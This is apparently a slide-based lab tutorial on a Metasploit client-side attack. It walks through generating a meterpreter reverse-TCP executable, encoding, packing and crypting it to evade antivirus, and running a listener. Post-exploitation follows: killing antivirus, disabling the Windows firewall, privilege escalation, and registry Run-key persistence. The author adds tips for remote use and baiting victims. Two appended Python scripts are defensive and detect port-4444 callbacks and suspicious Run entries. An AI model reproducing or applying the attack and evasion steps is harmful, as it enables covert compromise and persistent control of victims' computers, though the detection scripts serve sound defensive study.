3. Testing Environment pt.1
All examples shown will be performed in a controlled network; I do not condone the use of these methods in the wild.
Host Network: 192.168.1.0/24
  Host Computer
    Virtualised Environment (Oracle VirtualBox): WAN 192.168.56.0/24, LAN 10.0.2.0/24
      Virtual Router (pfSense): WAN 10.0.2.15, LAN 192.168.2.0/24
        Attacker (Kali)
        Client (Win7)
4. Testing Environment pt.2
VirtualBox Configuration
1. Download pfSense ISO (http://www.pfsense.org)
2. Create new VM using wizard
3. Install 2 NICs
4. NIC 1 should be configured to use NAT
5. NIC 2 should be configured to use Internal Network
6. Metasploit pt.1
Payload Creation
• Using msfpayload -h we can see all the available options.
• Using -l will show all of the available payloads; for this example we will be generating a meterpreter shell that connects back to the attacker, due to its flexibility.
• Select the meterpreter reverse TCP payload.
• Using msfpayload windows/meterpreter/reverse_tcp O will give us the payload options, which we will input in the next step.
• X creates an executable.
• > pay.exe exports the payload to the filename pay.exe.
• We will now have the executable pay.exe on our desktop.
Here we can choose how to output the payload: we can export to C or Ruby for later compiling, or we can export to Java if we wanted to create an applet attack. For this example, however, we will be exporting to an executable for an infectious media attack.
We have 2 configurable options for this payload:
1. LHOST – this is the address of the attacking machine (for this lab we will use a local address, however you can use an external address for a remote attack).
2. LPORT – this is the port used to connect back to the attacker. For this lab we will use port 4444; however, if you are behind a restrictive firewall you may want to select a port that will be open, e.g. 443 (SSL) or 53 (DNS). Also, if this is a remote attack you would have to port forward the selected port.
8. Checking Our Work
• Uploading the file to Metascan will check our payload against 43 antivirus scanning engines.
• Unfortunately the payload we created was detected 26 times; we now have to work on lowering this detection rate.
9. Metasploit pt.2
Payload Encoding
We use msfencode with the same command as before, however we now use the switch "R" to output the file as RAW and use "|" to pipe the file into msfencode.
• The raw output of the previous command is piped into another encoder using "|".
• We use msfencode -e x86/countdown -c 5 -t exe -o payenc.exe to encode the file again and then output the result to payenc.exe.
Note: this is by no means a comprehensive coverage of msfpayload or msfencode; I suggest reading Metasploit: The Penetration Tester's Guide for full usage of these tools.
Msfencode:
• -e – selects the encoder (in the example shikata_ga_nai is used)
• -c – sets the number of times the payload is encoded
• -t – sets the output file to RAW
Lastly we will pack our file to add an extra layer of obscurity using the following command (upx writes the packed copy to the file named by -o):
upx -9 -o payencpacked.exe payenc.exe
10. Checking Our Work
• Uploading the file shows the results are not good; antivirus vendors are getting wise towards the encoders we used.
• We now need to utilise some other methods to obfuscate the payload further.
11. Obfuscation pt.1
Over to you Windows
Nemesis Crypter
1. Main – select location of file
2. Options - set the encryption
algorithm to AES
3. Assembly Information – Set to random
4. Crypt file
12. Checking Our Work
Notice a Pattern Emerging
• Ok, so that's a good enough detection rate.
• It's interesting to note that all the free antivirus vendors failed to detect our payload (AVG, I'm looking at you) whilst Norton and Kaspersky still detected it, thus highlighting the need to PAY for a good antivirus.
13. Obfuscation pt.2
.net Shrink
DeepSea Obfuscator
.net Reactor
• No one method is foolproof; however, there are hundreds of tools to further obfuscate your payload, you just need to experiment.
• Antivirus vendors will eventually become wise to all encoders and obfuscators.
• I hope this highlights the importance of having a good antivirus (remember to laugh at Apple fanboys when they say they are immune to viruses).
14. Where are we now
We now have a payload that has a low detection rate... what do we do now?
Two things need to be accomplished:
1. We need a method for the payload to connect from the client machine to the attacking machine (this is a client-side attack, remember).
2. We need a way to get the victim to execute the payload (think social engineering; I will look forward to hearing your ideas).
15. Metasploit pt.3
• Remember that we programmed our payload to reverse connect to 192.168.2.11:4444.
• We now need to set Metasploit to listen for connections on 192.168.2.11:4444.
Start Metasploit using msfconsole, which starts listening for client connections.
16. Metasploit pt.3 cont.
set LHOST – sets the listen address, which is the IP of the attacker machine
set LPORT – sets the listen port
exploit – starts the listener
The attacking machine is now ready to accept incoming connections.
17. • User on client machine clicks malicious file
• Notice that nothing suspicious happens
• User assumes that it is just a broken file
• Little do they know...
Meanwhile the attacker machine has accepted a remote connection from the client. A meterpreter session is now open.
18. If we issue netstat -a on the client machine to list all remote connections, we see the connection from 192.168.2.7 (the client) to 192.168.2.11:4444 (the attacker).
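The netstat view above is also what a defender on the client side has to work with. As an added example (not part of the original slides), the following Python script parses a constructed sample of `netstat -an` output and flags established TCP connections whose remote port is either a well-known reverse-shell callback port (4444 is Metasploit's default LPORT, used throughout the slides) or simply not one the host is expected to talk to. The sample lines, the port lists and the ephemeral-port threshold are assumptions chosen for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample of "netstat -an" output from a Windows client. Addresses follow
# the lab in the slides (client 192.168.2.7, attacker 192.168.2.11); it is not a capture.
SAMPLE_NETSTAT = """
Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    192.168.2.7:49158      192.168.2.11:4444      ESTABLISHED
  TCP    192.168.2.7:49160      93.184.216.34:443      ESTABLISHED
  TCP    192.168.2.7:49161      192.168.2.11:8443      ESTABLISHED
  UDP    0.0.0.0:5355           *:*
"""

# One netstat row: proto, local addr:port, foreign addr:port, optional state.
LINE_RE = re.compile(
    r"^\s*(?P<proto>TCP|UDP)\s+(?P<laddr>\S+):(?P<lport>\d+)\s+"
    r"(?P<raddr>\S+):(?P<rport>\d+|\*)\s*(?P<state>\S+)?\s*$"
)

# Assumption: ports a reverse shell is commonly configured to call back to.
SUSPECT_PORTS = {4444, 4445, 1337}
# Assumption: outbound destination ports this host is expected to use.
EXPECTED_PORTS = {25, 53, 80, 443, 587, 993, 995}


def parse_netstat(text: str) -> List[Dict[str, str]]:
    """Turn netstat -an output into a list of connection records (headers skipped)."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        rec = m.groupdict()
        rec["state"] = rec["state"] or ""  # UDP rows carry no state column
        records.append(rec)
    return records


def flag_connections(records: List[Dict[str, str]],
                     suspect_ports=SUSPECT_PORTS,
                     expected_ports=EXPECTED_PORTS) -> List[Tuple[str, str]]:
    """Return (local -> remote, reason) for established TCP sessions worth a look."""
    hits = []
    for r in records:
        if r["proto"] != "TCP" or r["state"] != "ESTABLISHED":
            continue
        rport = int(r["rport"])
        conn = f"{r['laddr']}:{r['lport']} -> {r['raddr']}:{r['rport']}"
        if rport in suspect_ports:
            hits.append((conn, "known reverse-shell port"))
        elif rport not in expected_ports:
            hits.append((conn, "unexpected destination port"))
    return hits


if __name__ == "__main__":
    for conn, reason in flag_connections(parse_netstat(SAMPLE_NETSTAT)):
        print(f"{conn}  [{reason}]")
```

The port heuristic alone is weak: the slides themselves point out that an attacker behind a restrictive firewall would pick 443 or 53 instead of 4444, and the 443 session in the sample is deliberately not flagged. In practice the flagged sockets should be tied back to their owning process (`netstat -ano` adds the PID) so that, for example, a session owned by an unexpected binary stands out even on an expected port.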
20. Meterpreter
Post-Exploitation
We have our meterpreter session to the client machine; we now need to ensure the client stays compromised:
1. Kill any antivirus (although our payload hasn't been detected, any future modifications may reveal the payload to the antivirus).
2. Kill firewall
3. Migrate the meterpreter session to a secure process
4. Elevate our privileges
5. Make our meterpreter session persistent through reboots
21. idletime – we don't want to run these commands when the user is present.
ps – shows the running processes on the client machine.
We now need to disable the antivirus; in this case the client is running Security Essentials, msseces.exe = 2356, so we issue kill 2356 (note: it is useful to familiarise yourself with the processes other antivirus packages use).
Currently meterpreter is running as process "abc.exe", which is highly suspicious; using the migrate command we will run meterpreter as "explorer.exe" (note: when using meterpreter we use the PID number rather than the process name, e.g. explorer.exe = 1424).
Using "getsystem" and "getprivs" gives us the system user account and all the associated privileges.
Using "shell" we drop down into the Windows command line and issue the command "netsh advfirewall set allprofiles state off". The Windows firewall is now off.
The system is now defenceless and we have complete control.
I hope this slide has demonstrated the multidisciplinary nature of hacking by using both the Linux and Windows command lines. I would recommend reading the following texts to further familiarise yourselves with both command lines.
22. Meterpreter
Maintaining Access
1. Use the "shell" command to get a Windows command prompt.
2. We are now going to add a registry key that executes the payload at every boot by using the command reg add "path to registry key".
3. /v names the registry key
4. /t specifies the key type
5. /d defines the path to our executable
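The same Run-key mechanism is what a defender audits to catch this kind of persistence. As an added example (not part of the original slides), the following Python script parses a constructed sample of `reg query` output for a user's Run key and flags any entry whose executable does not live under a trusted system or program directory, which is how a payload dropped into a user-writable location such as Temp or the Desktop stands out. The sample entries, the key path shown and the trusted-prefix list are assumptions for the example; the entry name abc.exe is borrowed from the process name the slides use.

```python
import re
from typing import List, Tuple

# Constructed sample of "reg query HKCU\...\Run" output; the OneDrive entry is a
# typical legitimate value, the abc entry is a hypothetical payload autorun.
SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    OneDrive    REG_SZ    "C:\Program Files\Microsoft OneDrive\OneDrive.exe" /background
    abc    REG_SZ    C:\Users\victim\AppData\Local\Temp\abc.exe
"""

# One value line under a key: indented name, REG_* type, then the data.
ENTRY_RE = re.compile(r"^\s+(?P<name>\S+)\s+(?P<type>REG_\w+)\s+(?P<data>.+?)\s*$")

# Assumption: executables under these prefixes are installed software, not user drops.
TRUSTED_PREFIXES = (
    r"c:\program files\\",
    r"c:\program files (x86)\\",
    r"c:\windows\\",
)


def extract_exe(data: str) -> str:
    """Pull the executable path out of a Run value, handling quoted paths with arguments."""
    data = data.strip()
    if data.startswith('"'):
        end = data.find('"', 1)
        return data[1:end] if end > 0 else data[1:]
    return data.split()[0]


def run_entries(text: str) -> List[Tuple[str, str]]:
    """Return (value name, executable path) for every value line in the reg output."""
    entries = []
    for line in text.splitlines():
        m = ENTRY_RE.match(line)
        if m:
            entries.append((m["name"], extract_exe(m["data"])))
    return entries


def suspicious_run_entries(text: str) -> List[Tuple[str, str]]:
    """Entries whose executable is outside the trusted prefixes (case-insensitive)."""
    hits = []
    for name, exe in run_entries(text):
        low = exe.lower()
        if not any(low.startswith(p.rstrip("\\") + "\\") for p in TRUSTED_PREFIXES):
            hits.append((name, exe))
    return hits


if __name__ == "__main__":
    for name, exe in suspicious_run_entries(SAMPLE_REG_QUERY):
        print(f"Run value {name!r} starts {exe} from an untrusted location")
```

On a live host the text would come from `reg query` against both the HKCU and HKLM Run and RunOnce keys; a location check like this is only a first filter, and a hit should be followed by checking the file's signature and hash rather than trusting the path alone.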